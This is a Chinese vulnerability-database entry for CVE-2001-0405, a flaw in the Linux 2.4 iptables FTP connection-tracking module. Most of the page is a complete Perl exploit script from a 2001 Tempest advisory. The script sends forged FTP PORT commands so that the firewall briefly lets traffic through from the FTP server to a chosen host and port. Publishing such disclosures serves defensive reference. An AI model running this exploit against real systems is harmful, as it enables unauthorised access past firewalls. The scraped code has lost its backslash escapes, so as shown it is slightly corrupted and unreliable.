Linux防火墙漏洞

Linux防火墙漏洞

漏洞ID 1106299 漏洞类型 未知
发布时间 2001-04-16 更新时间 2005-08-17
图片[1]-Linux防火墙漏洞-安全小百科CVE编号 CVE-2001-0405
图片[2]-Linux防火墙漏洞-安全小百科CNNVD-ID CNNVD-200107-041
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/20765
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-041
|漏洞详情
Linux2.4版本的IPTables防火墙中的ip_conntrack_ftp存在漏洞。远程攻击者可以为FTP服务器借助列举任意IP地址和端口号码的PORT命令绕过访问限制。
|漏洞EXP
# source: http://www.securityfocus.com/bid/2602/info
#
# The Linux kernel includes a built-in firewall implementation called IPTables. IPTables supports stateful inspection of several application protocols, one of which is FTP. The inspection is used to facilitate outgoing PORT connections for FTP data transfers when clients or servers are behind firewalls.
#
# When a FTP PORT command containing an IP address which differs from the client's is processed by the stateful-inspection module, the occurrance is caught. Despite being detected, the condition is handled erroneously causing an entry for the PORT connection to be inserted into the table of 'RELATED' connections. This temporarily permits traffic through the firewall from the FTP server to the destination included in the PORT command.
#
# An attacker may be able to use this vulnerability to access unauthorized hosts from the FTP server.
#
# It should be noted that clients do not need to authenticate to exploit this vulnerability. 
#

#!/usr/bin/perl
#
# nf-drill.pl --- "Drill" holes open in Linux iptables connection table
# Author: Cristiano Lincoln Mattos <[email protected]>, 2001
# 
# Advisory: http://www.tempest.com.br/advisories/linux-iptables
# 
#      Tempest Security Technologies - a business unit of:
#    CESAR - Centro de Estudos e Sistemas Avancados do Recife
#
# This code is licensed under the GPL.
#

use Socket;
use Getopt::Long;
use strict;

# Option variables
my $server;
my $serverport = 21;
my $host;
my $port;
my $verbose = 0;

# Print function
sub out {
	my ($level,$text) = @_;
	if (!$level || ($level && $verbose)) { print "$text"; }
}

my $opt = GetOptions("server=s" => $server,
		     "serverport=s" => $serverport,
		     "host=s" => $host,
		     "port=i" => $port,
		     "verbose" => $verbose);

if ($server eq "" || $host eq "" || $port eq "" || $port < 0 || $port > 65535) {
	print "Usage: $0 --server <ftp> [--serverport <port>] --host <target> --port <port> [--verbose]n";
	print "   - server: specifies the FTP server (IP or hostname) to connect ton";
	print "   - serverport: specifies the port of the FTP server -- default: 21n";
	print "   - host: the IP of the target to open in the connection tablen";
	print "   - port: the port of the target to open in the connection tablen";
	print "   - verbose: sets verbose moden";
	exit(0);
}

print "n nf-blast.pl -- Cristiano Lincoln Mattos <[email protected]>, 2001n";
print " Tempest Security Technologiesnn";

# For the meanwhile, expecting an IP
my @ip = split(/./,$host);
my $str = "PORT " . $ip[0] . "," . $ip[1] . "," . $ip[2] . "," . $ip[3] . "," . ($port >> 8) . "," . ($port % 256) . "rn";

# Socket init
my $ipn = inet_aton($server);
if (!$ipn) {
	out(0," Error: could not convert $servern");
	exit(0);
}

my $sin = sockaddr_in($serverport,$ipn);
socket(Sock,PF_INET,SOCK_STREAM,6);

if (!connect(Sock,$sin)) {
	out(0," Error: could not connect to $server:$serverport.n");
	exit(0);
}
out(0," - Connected to $server:$serverportn");

my $buf;
recv(Sock,$buf,120,0); chomp($buf);
out(1," - RECV: $bufn");

# First send a dummy one, just to establish the connection in the iptables logic
send(Sock,$str,0);
out(1," - SEND: $str");
recv(Sock,$buf,120,0); chomp($buf);
out(1," - RECV: $bufn");

# Now, send the one that will insert itself into the connection table
send(Sock,$str,0);
out(1," - SEND: $str");
recv(Sock,$buf,120,0); chomp($buf);
out(1," - RECV: $bufn");

out(0," * $server should now be able to connect to $host on port $port ! (for the next 10 seconds)n");
out(0," - Closing connection to $server:$serverport.nn");
close(Sock);
|参考资料

来源:BID
名称:2602
链接:http://www.securityfocus.com/bid/2602
来源:BUGTRAQ
名称:20010416TempestSecurityTechonologies–Adivsory#01/2001–LinuxIPTables
链接:http://archives.neohapsis.com/archives/bugtraq/2001-04/0271.html
来源:REDHAT
名称:RHSA-2001:052
链接:http://www.redhat.com/support/errata/RHSA-2001-052.html
来源:XF
名称:linux-netfilter-iptables(6390)
链接:http://xforce.iss.net/static/6390.php
来源:REDHAT
名称:RHSA-2001:084
链接:http://www.redhat.com/support/errata/RHSA-2001-084.html
来源:MANDRAKE
名称:MDKSA-2001:071
链接:http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-071.php3

相关推荐: DCShop Beta Form Manipulation Vulnerability

DCShop Beta Form Manipulation Vulnerability 漏洞ID 1102366 漏洞类型 Input Validation Error 发布时间 2002-03-25 更新时间 2002-03-25 CVE编号 N/A CNN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享